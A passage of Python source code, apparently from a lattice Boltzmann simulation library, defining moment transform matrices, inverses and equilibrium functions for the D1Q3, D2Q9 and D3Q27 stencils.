def equilibrium(self, m):
"""A very inefficient and basic implementation of the equilibrium moments.
"""
warnings.warn(
"Transform.equilibrium is a poor man's implementation of the moment equilibrium."
"Please consider implementing the equilibrium moments for your transform by hand.",
InefficientCodeWarning
)
f = self.inverse_transform(m)
feq = self.lattice.equilibrium(self.lattice.rho(f), self.lattice.u(f))
return self.transform(feq)
class D1Q3Transform(Transform):
matrix = np.array([
[1, 1, 1],
[0, 1, -1],
[0, 1, 1]
])
inverse = np.array([
[1, 0, -1],
[0, 1 / 2, 1 / 2],
[0, -1 / 2, 1 / 2]
])
names = ["rho", "j", "e"]
supported_stencils = [D1Q3]
def __init__(self, lattice):
super(D1Q3Transform, self).__init__(lattice, self.names)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
# def equilibrium(self, m):
# # TODO
# raise NotImplementedError
class D2Q9Dellar(Transform):
matrix = np.array(
[[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, -1, 0, 1, -1, -1, 1],
[0, 0, 1, 0, -1, 1, 1, -1, -1],
[-3 / 2, 3, -3 / 2, 3, -3 / 2, 3, 3, 3, 3],
[0, 0, 0, 0, 0, 9, -9, 9, -9],
[-3 / 2, -3 / 2, 3, -3 / 2, 3, 3, 3, 3, 3],
[1, -2, -2, -2, -2, 4, 4, 4, 4],
[0, -2, 0, 2, 0, 4, -4, -4, 4],
[0, 0, -2, 0, 2, 4, 4, -4, -4]]
)
inverse = np.array(
[[4 / 9, 0, 0, -4 / 27, 0, -4 / 27, 1 / 9, 0, 0],
[1 / 9, 1 / 3, 0, 2 / 27, 0, -1 / 27, -1 / 18, -1 / 12, 0],
[1 / 9, 0, 1 / 3, -1 / 27, 0, 2 / 27, -1 / 18, 0, -1 / 12],
[1 / 9, -1 / 3, 0, 2 / 27, 0, -1 / 27, -1 / 18, 1 / 12, 0],
[1 / 9, 0, -1 / 3, -1 / 27, 0, 2 / 27, -1 / 18, 0, 1 / 12],
[1 / 36, 1 / 12, 1 / 12, 1 / 54, 1 / 36, 1 / 54, 1 / 36, 1 / 24, 1 / 24],
[1 / 36, -1 / 12, 1 / 12, 1 / 54, -1 / 36, 1 / 54, 1 / 36, -1 / 24, 1 / 24],
[1 / 36, -1 / 12, -1 / 12, 1 / 54, 1 / 36, 1 / 54, 1 / 36, -1 / 24, -1 / 24],
[1 / 36, 1 / 12, -1 / 12, 1 / 54, -1 / 36, 1 / 54, 1 / 36, 1 / 24, -1 / 24]]
)
names = ['rho', 'jx', 'jy', 'Pi_xx', 'Pi_xy', 'PI_yy', 'N', 'Jx', 'Jy']
supported_stencils = [D2Q9]
def __init__(self, lattice):
super(D2Q9Dellar, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
warnings.warn("I am not 100% sure if this equilibrium is correct.", ExperimentalWarning)
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
Pi_xx = jx * jx / rho * 9 / 2
Pi_xy = jx * jy / rho * 9
Pi_yy = jy * jy / rho * 9 / 2
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = Pi_xx
meq[4] = Pi_xy
meq[5] = Pi_yy
return meq
class D2Q9Lallemand(Transform):
matrix = np.array(
[[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, -1, 0, 1, -1, -1, 1],
[0, 0, 1, 0, -1, 1, 1, -1, -1],
[0, 1, -1, 1, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, -1, 1, -1],
[-4, -1, -1, -1, -1, 2, 2, 2, 2],
[0, -2, 0, 2, 0, 1, -1, -1, 1],
[0, 0, -2, 0, 2, 1, 1, -1, -1],
[4, -2, -2, -2, -2, 1, 1, 1, 1]]
)
inverse = np.array(
[[1 / 9, 0, 0, 0, 0, -1 / 9, 0, 0, 1 / 9],
[1 / 9, 1 / 6, 0, 1 / 4, 0, -1 / 36, -1 / 6, 0, -1 / 18],
[1 / 9, 0, 1 / 6, -1 / 4, 0, -1 / 36, 0, -1 / 6, -1 / 18],
[1 / 9, -1 / 6, 0, 1 / 4, 0, -1 / 36, 1 / 6, 0, -1 / 18],
[1 / 9, 0, -1 / 6, -1 / 4, 0, -1 / 36, 0, 1 / 6, -1 / 18],
[1 / 9, 1 / 6, 1 / 6, 0, 1 / 4, 1 / 18, 1 / 12, 1 / 12, 1 / 36],
[1 / 9, -1 / 6, 1 / 6, 0, -1 / 4, 1 / 18, -1 / 12, 1 / 12, 1 / 36],
[1 / 9, -1 / 6, -1 / 6, 0, 1 / 4, 1 / 18, -1 / 12, -1 / 12, 1 / 36],
[1 / 9, 1 / 6, -1 / 6, 0, -1 / 4, 1 / 18, 1 / 12, -1 / 12, 1 / 36]]
)
names = ['rho', 'jx', 'jy', 'pxx', 'pxy', 'e', 'qx', 'qy', 'eps']
supported_stencils = [D2Q9]
def __init__(self, lattice):
super(D2Q9Lallemand, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
"""From Lallemand and Luo"""
warnings.warn("I am not 100% sure if this equilibrium is correct.", ExperimentalWarning)
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
c1 = -2
alpha2 = -8
alpha3 = 4
gamma1 = 2 / 3
gamma2 = 18
gamma3 = 2 / 3
gamma4 = -18
e = 1 / 4 * alpha2 * rho + 1 / 6 * gamma2 * (jx ** 2 + jy ** 2)
eps = 1 / 4 * alpha3 * rho + 1 / 6 * gamma4 * (jx ** 2 + jy ** 2)
qx = 1 / 2 * c1 * jx
qy = 1 / 2 * c1 * jy
pxx = 1 / 2 * gamma1 * (jx ** 2 - jy ** 2)
pxy = 1 / 2 * gamma3 * (jx * jy)
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = pxx
meq[4] = pxy
meq[5] = e
meq[6] = qx
meq[7] = qy
meq[8] = eps
return meq
"""
D3Q19 is not implemented, yet. Also, the moments should be ordered so that 1...D+1 correspond to momentum,
which is not the case for this matrix.
"""
# class D3Q19DHumieres(NaturalMomentTransform):
# matrix = np.array(
# [[1 / 1, 1, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1],
# [-30, -11, -11, -11 / 1, -11, -11, -11, 8, 8, 8, 8 / 1, 8, 8, 8, 8, 8, 8, 8, 8 / 1],
# [12, -4, -4, -4, -4, -4 / 1, -4, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1, 1, 1, 1],
# [0, 1 / 1, 0, -1, 0, 0, 0, 1, -1, -1, 1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, -4, 0, 4, 0, 0, 0, 1 / 1, -1, -1, 1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, 1, 0, 0, 0, 0, -1, 1, 1, -1, -1, 1 / 1, 1, -1],
# [0, 0, 0, 0, 0, 4, -4, 0, 0, 0, 0, -1, 1, 1, -1, -1, 1, 1, -1 / 1],
# [0, 0, 1, 0, -1, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1, -1, -1],
# [0, 0, -4, 0, 4, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1 / 1, -1, -1],
# [0, 2, -1, 2 / 1, -1, -1, -1, 1, 1, 1, 1, 1, 1, 1, 1, -2, -2, -2, -2 / 1],
# [0, -4, 2, -4, 2, 2 / 1, 2, 1, 1, 1, 1, 1, 1, 1 / 1, 1, -2, -2, -2, -2],
# [0, 0, -1, 0, -1, 1, 1, -1, -1 / 1, -1, -1, 1, 1, 1, 1, 0, 0, 0, 0],
# [0, 0, 2 / 1, 0, 2, -2, -2, -1, -1, -1 / 1, -1, 1, 1, 1, 1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 1, -1, 1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 1, -1, 1],
# [0, 0, 0, 0, 0, 0, 0, 1, -1, 1, -1, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -1 / 1, 1, 1, -1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, -1, 1, -1, 1, 1, -1],
# [0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, -1. / 1, -1, 1, 1]]
# )
# inverse = np.array(
# [[1 / 19, -5 / 399, 1 / 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 1 / 10, -1 / 10, 0, 0, 0, 0, 1 / 18, -1 / 18, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, 0, 0, 1 / 10, -1 / 10, -1 / 36, 1 / 36, -1 / 12, 1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, -1 / 10, 1 / 10, 0, 0, 0, 0, 1 / 18, -1 / 18, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, 0, 0, -1 / 10, 1 / 10, -1 / 36, 1 / 36, -1 / 12, 1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, -1. / 10, 1 / 10, 0, 0, -1 / 36, 1 / 36, 1 / 12, -1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11. / 2394, -1 / 63, 0, 0, 1 / 10, -1. / 10, 0, 0, -1 / 36, 1 / 36, 1 / 12, -1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, 4 / 1197, 1. / 252, 1 / 10, 1 / 40, 0, 0, 1 / 10, 1 / 40, 1 / 36, 1 / 72, -1 / 12, -1 / 24, 0, 0, 1 / 4, -1 / 8, 0, 1. / 8],
# [1 / 19, 4 / 1197, 1 / 252, -1 / 10, -1 / 40, 0, 0, 1 / 10, 1 / 40, 1 / 36, 1 / 72, -1 / 12, -1 / 24, 0, 0, -1 / 4, 1. / 8, 0, 1 / 8],
# [1 / 19, 4. / 1197, 1 / 252, -1 / 10, -1 / 40, 0, 0, -1 / 10, -1 / 40, 1 / 36, 1 / 72, -1. / 12, -1 / 24, 0, 0, 1 / 4, 1 / 8, 0, -1 / 8],
# [1 / 19, 4 / 1197, 1. / 252, 1 / 10, 1 / 40, 0, 0, -1. / 10, -1 / 40, 1 / 36, 1 / 72, -1 / 12, -1. / 24, 0, 0, -1 / 4, -1 / 8, 0, -1 / 8],
# [1 / 19, 4 / 1197, 1 / 252, 1. / 10, 1 / 40, -1 / 10, -1 / 40, 0, 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, -1 / 4, 0, 0, 1 / 8, 1 / 8, 0],
# [1 / 19, 4 / 1197, 1 / 252, 1 / 10, 1 / 40, 1. / 10, 1 / 40, 0, 0, 1 / 36, 1. / 72, 1 / 12, 1 / 24, 1 / 4, 0, 0, 1 / 8, - 1 / 8, 0],
# [1. / 19, 4 / 1197, 1 / 252, - 1 / 10, - 1 / 40, 1. / 10, 1 / 40, - 0, - 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, - 1 / 4, 0, 0, -1. / 8, -1 / 8, 0],
# [1 / 19, 4. / 1197, 1 / 252, -1 / 10, -1 / 40, -1 / 10, -1. / 40, 0, 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, 1 / 4, 0, 0, -1 / 8, 1 / 8, 0],
# [1 / 19, 4 / 1197, 1 / 252, 0, 0, -1 / 10, -1 / 40, 1 / 10, 1 / 40, -1 / 18, -1 / 36, 0, 0, 0, -1. / 4, 0, 0, -1 / 8, -1 / 8],
# [1 / 19, 4 / 1197, 1 / 252, 0, 0, 1. / 10, 1 / 40, 1 / 10, 1 / 40, -1 / 18, -1. / 36, 0, 0, 0, 1 / 4, 0, 0, 1 / 8, -1 / 8],
# [1 / 19, 4. / 1197, 1 / 252, 0, 0, 1 / 10, 1. / 40, -1 / 10, -1 / 40, -1 / 18, -1 / 36, 0, 0, 0, -1 / 4, 0, 0, 1 / 8, 1 / 8],
# [1 / 19, 4 / 1197, 1. / 252, 0, 0, -1 / 10, -1 / 40, -1. / 10, -1 / 40, -1 / 18, -1 / 36, 0, 0, 0, 1 / 4, 0, 0, -1 / 8, 1. / 8]]
# )
# names = ['rho', 'e', 'eps', 'jx', 'qx', 'jy', 'qy', 'jz', 'qz', '3pxx', '3pixx', 'pww', 'piww', 'pxy', 'pxz', 'pxx', 'mx', 'my', 'mz']
# def __init__(self, lattice):
# assert lattice.stencil == D3Q19
# super(D3Q19DHumieres, self).__init__(
# lattice,
# lattice.convert_to_tensor(self.matrix),
# lattice.convert_to_tensor(self.inverse)
# )
#
# class D3Q27CumulantTransform(Transform):
# def __init__(self, lattice):
# raise NotImplementedError
class D3Q27Hermite(Transform):
matrix = np.array([
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, -1, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1],
[0, 0, 0, 1, -1, 0, 0, 1, -1, 1, -1, 0, 0, 0, 0, 1, -1, -1, 1, 1, -1, 1, -1, -1, 1, -1, 1],
[0, 0, 0, 0, 0, 1, -1, 1, -1, -1, 1, 1, -1, -1, 1, 0, 0, 0, 0, 1, -1, -1, 1, 1, -1, -1, 1],
[-1 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3,
2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, 1, 1, -1, -1, -1, -1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, -1],
[-1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, -1 / 3,
-1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, -1, -1, 1, 1],
[-1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3,
-1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, -1 / 3, 1 / 3, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 0, 0, 0, 0, 2 / 3, -2 / 3, -2 / 3, 2 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3],
[0, 0, 0, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, 0, 0, 0, 0, 2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3],
[0, -1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, -1, 1, -1, 1, 1, -1],
[0, -1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, 2 / 3, -2 / 3, 2 / 3, -2 / 3, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3],
[0, 0, 0, 0, 0, -1 / 3, 1 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 0, 0, 0, 0, 2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3],
[0, 0, 0, -1 / 3, 1 / 3, 0, 0, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 0, 0, 0, 0, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3],
[1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9,
-2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, 2 / 3, 2 / 3, -2 / 3, -2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3],
[1 / 9, -2 / 9, -2 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9,
4 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 0, 0, 0, 0, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3,
2 / 3, -2 / 3, -2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 1 / 3, 1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, -2 / 3,
-2 / 3, -2 / 3, -2 / 3],
[1 / 9, 1 / 9, 1 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, -2 / 9, -2 / 9, -2 / 9,
-2 / 9, -2 / 9, -2 / 9, -2 / 9, -2 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9, 4 / 9],
[0, 0, 0, 0, 0, 1 / 9, -1 / 9, -2 / 9, 2 / 9, 2 / 9, -2 / 9, -2 / 9, 2 / 9, 2 / 9, -2 / 9, 0, 0, 0, 0, 4 / 9,
-4 / 9, -4 / 9, 4 / 9, 4 / 9, -4 / 9, -4 / 9, 4 / 9],
[0, 0, 0, 1 / 9, -1 / 9, 0, 0, -2 / 9, 2 / 9, -2 / 9, 2 / 9, 0, 0, 0, 0, -2 / 9, 2 / 9, 2 / 9, -2 / 9, 4 / 9,
-4 / 9, 4 / 9, -4 / 9, -4 / 9, 4 / 9, -4 / 9, 4 / 9],
[0, 1 / 9, -1 / 9, 0, 0, 0, 0, 0, 0, 0, 0, -2 / 9, 2 / 9, -2 / 9, 2 / 9, -2 / 9, 2 / 9, -2 / 9, 2 / 9, 4 / 9,
-4 / 9, 4 / 9, -4 / 9, 4 / 9, -4 / 9, 4 / 9, -4 / 9],
[-1 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, 2 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27,
-4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, -4 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27, 8 / 27,
8 / 27],
])
inverse = np.array([
[8 / 27, 0, 0, 0, -4 / 9, 0, 0, -4 / 9, 0, -4 / 9, 0, 0, 0, 0, 0, 0, 0, 2 / 3, 0, 2 / 3, 0, 0, 2 / 3, 0, 0, 0,
-1],
[2 / 27, 2 / 9, 0, 0, 2 / 9, 0, 0, -1 / 9, 0, -1 / 9, 0, 0, -1 / 3, 0, -1 / 3, 0, 0, -1 / 3, 0, -1 / 3, 0, 0,
1 / 6, 0, 0, 1 / 2, 1 / 2],
[2 / 27, -2 / 9, 0, 0, 2 / 9, 0, 0, -1 / 9, 0, -1 / 9, 0, 0, 1 / 3, 0, 1 / 3, 0, 0, -1 / 3, 0, -1 / 3, 0, 0,
1 / 6, 0, 0, -1 / 2, 1 / 2],
[2 / 27, 0, 2 / 9, 0, -1 / 9, 0, 0, 2 / 9, 0, -1 / 9, -1 / 3, 0, 0, 0, 0, 0, -1 / 3, -1 / 3, 0, 1 / 6, 0, 0,
-1 / 3, 0, 1 / 2, 0, 1 / 2],
[2 / 27, 0, -2 / 9, 0, -1 / 9, 0, 0, 2 / 9, 0, -1 / 9, 1 / 3, 0, 0, 0, 0, 0, 1 / 3, -1 / 3, 0, 1 / 6, 0, 0,
-1 / 3, 0, -1 / 2, 0, 1 / 2],
[2 / 27, 0, 0, 2 / 9, -1 / 9, 0, 0, -1 / 9, 0, 2 / 9, 0, -1 / 3, 0, 0, 0, -1 / 3, 0, 1 / 6, 0, -1 / 3, 0, 0,
-1 / 3, 1 / 2, 0, 0, 1 / 2],
[2 / 27, 0, 0, -2 / 9, -1 / 9, 0, 0, -1 / 9, 0, 2 / 9, 0, 1 / 3, 0, 0, 0, 1 / 3, 0, 1 / 6, 0, -1 / 3, 0, 0,
-1 / 3, -1 / 2, 0, 0, 1 / 2],
[1 / 54, 0, 1 / 18, 1 / 18, -1 / 36, 0, 0, 1 / 18, 1 / 6, 1 / 18, -1 / 12, -1 / 12, 0, 0, 0, 1 / 6, 1 / 6,
-1 / 12, -1 / 4, -1 / 12, 0, 0, 1 / 6, -1 / 4, -1 / 4, 0, -1 / 4],
[1 / 54, 0, -1 / 18, -1 / 18, -1 / 36, 0, 0, 1 / 18, 1 / 6, 1 / 18, 1 / 12, 1 / 12, 0, 0, 0, -1 / 6, -1 / 6,
-1 / 12, -1 / 4, -1 / 12, 0, 0, 1 / 6, 1 / 4, 1 / 4, 0, -1 / 4],
[1 / 54, 0, 1 / 18, -1 / 18, -1 / 36, 0, 0, 1 / 18, -1 / 6, 1 / 18, -1 / 12, 1 / 12, 0, 0, 0, -1 / 6, 1 / 6,
-1 / 12, 1 / 4, -1 / 12, 0, 0, 1 / 6, 1 / 4, -1 / 4, 0, -1 / 4],
[1 / 54, 0, -1 / 18, 1 / 18, -1 / 36, 0, 0, 1 / 18, -1 / 6, 1 / 18, 1 / 12, -1 / 12, 0, 0, 0, 1 / 6, -1 / 6,
-1 / 12, 1 / 4, -1 / 12, 0, 0, 1 / 6, -1 / 4, 1 / 4, 0, -1 / 4],
[1 / 54, 1 / 18, 0, 1 / 18, 1 / 18, 0, 1 / 6, -1 / 36, 0, 1 / 18, 0, 1 / 6, -1 / 12, 0, 1 / 6, -1 / 12, 0,
-1 / 12, 0, 1 / 6, -1 / 4, 0, -1 / 12, -1 / 4, 0, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 0, -1 / 18, 1 / 18, 0, 1 / 6, -1 / 36, 0, 1 / 18, 0, -1 / 6, 1 / 12, 0, -1 / 6, 1 / 12, 0,
-1 / 12, 0, 1 / 6, -1 / 4, 0, -1 / 12, 1 / 4, 0, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, 0, -1 / 18, 1 / 18, 0, -1 / 6, -1 / 36, 0, 1 / 18, 0, -1 / 6, -1 / 12, 0, 1 / 6, 1 / 12, 0,
-1 / 12, 0, 1 / 6, 1 / 4, 0, -1 / 12, 1 / 4, 0, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 0, 1 / 18, 1 / 18, 0, -1 / 6, -1 / 36, 0, 1 / 18, 0, 1 / 6, 1 / 12, 0, -1 / 6, -1 / 12, 0,
-1 / 12, 0, 1 / 6, 1 / 4, 0, -1 / 12, -1 / 4, 0, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, 1 / 18, 0, 1 / 18, 1 / 6, 0, 1 / 18, 0, -1 / 36, 1 / 6, 0, 1 / 6, 0, -1 / 12, 0, -1 / 12,
1 / 6, 0, -1 / 12, 0, -1 / 4, -1 / 12, 0, -1 / 4, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, -1 / 18, 0, 1 / 18, 1 / 6, 0, 1 / 18, 0, -1 / 36, -1 / 6, 0, -1 / 6, 0, 1 / 12, 0, 1 / 12,
1 / 6, 0, -1 / 12, 0, -1 / 4, -1 / 12, 0, 1 / 4, 1 / 4, -1 / 4],
[1 / 54, 1 / 18, -1 / 18, 0, 1 / 18, -1 / 6, 0, 1 / 18, 0, -1 / 36, -1 / 6, 0, 1 / 6, 0, -1 / 12, 0, 1 / 12,
1 / 6, 0, -1 / 12, 0, 1 / 4, -1 / 12, 0, 1 / 4, -1 / 4, -1 / 4],
[1 / 54, -1 / 18, 1 / 18, 0, 1 / 18, -1 / 6, 0, 1 / 18, 0, -1 / 36, 1 / 6, 0, -1 / 6, 0, 1 / 12, 0, -1 / 12,
1 / 6, 0, -1 / 12, 0, 1 / 4, -1 / 12, 0, -1 / 4, 1 / 4, -1 / 4],
[1 / 216, 1 / 72, 1 / 72, 1 / 72, 1 / 72, 1 / 24, 1 / 24, 1 / 72, 1 / 24, 1 / 72, 1 / 24, 1 / 24, 1 / 24, 1 / 8,
1 / 24, 1 / 24, 1 / 24, 1 / 24, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, -1 / 72, -1 / 72, 1 / 72, 1 / 24, 1 / 24, 1 / 72, 1 / 24, 1 / 72, -1 / 24, -1 / 24, -1 / 24,
-1 / 8, -1 / 24, -1 / 24, -1 / 24, 1 / 24, 1 / 8, 1 / 24, 1 / 8, 1 / 8, 1 / 24, -1 / 8, -1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, 1 / 72, -1 / 72, 1 / 72, 1 / 24, -1 / 24, 1 / 72, -1 / 24, 1 / 72, 1 / 24, -1 / 24, 1 / 24,
-1 / 8, 1 / 24, -1 / 24, 1 / 24, 1 / 24, -1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, -1 / 72, 1 / 72, 1 / 72, 1 / 24, -1 / 24, 1 / 72, -1 / 24, 1 / 72, -1 / 24, 1 / 24, -1 / 24,
1 / 8, -1 / 24, 1 / 24, -1 / 24, 1 / 24, -1 / 8, 1 / 24, -1 / 8, 1 / 8, 1 / 24, 1 / 8, -1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, -1 / 72, 1 / 72, 1 / 72, -1 / 24, 1 / 24, 1 / 72, -1 / 24, 1 / 72, -1 / 24, 1 / 24, 1 / 24,
-1 / 8, 1 / 24, 1 / 24, -1 / 24, 1 / 24, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, 1 / 72, -1 / 72, 1 / 72, -1 / 24, 1 / 24, 1 / 72, -1 / 24, 1 / 72, 1 / 24, -1 / 24, -1 / 24,
1 / 8, -1 / 24, -1 / 24, 1 / 24, 1 / 24, -1 / 8, 1 / 24, 1 / 8, -1 / 8, 1 / 24, -1 / 8, 1 / 8, -1 / 8, 1 / 8],
[1 / 216, 1 / 72, -1 / 72, -1 / 72, 1 / 72, -1 / 24, -1 / 24, 1 / 72, 1 / 24, 1 / 72, -1 / 24, -1 / 24, 1 / 24,
1 / 8, 1 / 24, -1 / 24, -1 / 24, 1 / 24, 1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 8, 1 / 8],
[1 / 216, -1 / 72, 1 / 72, 1 / 72, 1 / 72, -1 / 24, -1 / 24, 1 / 72, 1 / 24, 1 / 72, 1 / 24, 1 / 24, -1 / 24,
-1 / 8, -1 / 24, 1 / 24, 1 / 24, 1 / 24, 1 / 8, 1 / 24, -1 / 8, -1 / 8, 1 / 24, 1 / 8, 1 / 8, -1 / 8, 1 / 8],
])
names = ['rho', 'jx', 'jy', 'jz', 'Pi_xx', 'Pi_xy', 'PI_xz', 'PI_yy', 'PI_yz', 'PI_zz',
